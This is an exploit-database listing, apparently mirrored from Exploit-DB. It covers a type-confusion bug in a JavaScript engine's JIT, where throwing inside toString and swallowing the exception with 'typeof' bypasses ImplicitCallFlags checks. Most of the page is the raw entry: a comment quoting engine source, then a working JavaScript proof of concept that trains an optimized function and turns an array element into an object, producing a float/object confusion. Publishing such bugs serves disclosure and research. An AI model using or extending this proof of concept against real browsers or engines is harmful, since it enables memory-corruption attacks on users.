header-logo
Suggest Exploit
vendor:
N/A
by:
Anonymous
8.8
CVSS
HIGH
Type Confusion
843
CWE
Product Name: N/A
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: N/A
2020

Bypassing ImplicitCallFlags Checks using Typeof

This exploit is based on the fact that the ImplicitCallFlags flag is not updated if an exception is thrown during an implicit call. This can be bypassed by throwing an exception and clearing it using the 'typeof' operator. This is demonstrated in the code snippet, where an exception is thrown from the toString function and is cleared using the 'typeof' operator. This allows the arr[0] to be set to an object, which can be used to exploit the application.

Mitigation:

Ensure that the ImplicitCallFlags flag is updated even if an exception is thrown during an implicit call.
Source

Exploit-DB raw data:

/*
Here's a snippet of ExecuteImplicitCall which is responsible for updating the ImplicitCallFlags flag.
    template <class Fn>
    inline Js::Var ExecuteImplicitCall(Js::RecyclableObject * function, Js::ImplicitCallFlags flags, Fn implicitCall)
    {
        ...
        Js::ImplicitCallFlags saveImplicitCallFlags = this->GetImplicitCallFlags();
        Js::Var result = implicitCall();
        this->SetImplicitCallFlags((Js::ImplicitCallFlags)(saveImplicitCallFlags | flags));
        return result;
    }

It updates the flag after the implicit call. So if an exception is thrown during the implicit call, the flag will remain not updated. And the execution will be broken until the exeception gets handled. Namely, if we can ignore the exception in any way, we can bypass the ImplicitCallFlags checks.

At this point, "typeof" comes to rescue. The weird handler for "typeof" catchs execptions and clears them. For example, in the following code, the exeception thrown from toString will be ignored.

let o = {
    toString: () => {
        throw 1;
    }
};

typeof(this[o]);

So, we can bypass the ImplicitCallFlags checks by throwing an exception and clearing it using "typeof".
*/

function opt(arr, index) {
    arr[0] = 1.1;
    typeof(arr[index]);
    arr[0] = 2.3023e-320;
}

function main() {
    let arr = [1.1, 2.2, 3.3];
    for (let i = 0; i < 0x10000; i++) {
        opt(arr, {});
    }

    opt(arr, {toString: () => {
        arr[0] = {};

        throw 1;
    }});

    print(arr[0]);
}

main();

Navigation

Suggest Exploit

Services By CQR